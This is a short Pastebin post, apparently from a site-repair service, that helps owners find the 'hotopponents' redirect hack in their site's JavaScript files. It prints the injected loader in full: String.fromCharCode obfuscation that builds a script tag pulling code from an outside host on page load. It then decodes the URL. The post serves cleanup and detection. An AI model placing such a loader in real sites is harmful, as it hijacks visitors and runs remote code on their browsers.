hackrepair

"hotopponents" redirect hack using CharCode

Oct 15th, 2018
755
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.66 KB | None | 0 0
  1. If you've been fighting the "hotopponents" redirect hack
  2. and haven't been able to locate the redirect code,
  3. check for this clever use of CharCode encoding within the site's javascript files:
  4.  
  5. (function(){ var s1=document.createElement("script"),s0=document.getElementsByTagName("script")[0]; s1.async=true; s1.src=String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, 104, 111, 116, 111, 112, 112, 111, 110, 101, 110, 116, 115, 46, 115, 105, 116, 101, 47, 115, 105, 116, 101, 46, 106, 115, 63, 119, 116, 114, 61, 50); s0.parentNode.insertBefore(s1,s0); })();
  6.  
  7. Which translates to text (edited with spaces) below:
  8. https://hotopponents .site / site .js ? wtr = 2
Add Comment
Please, Sign In to add comment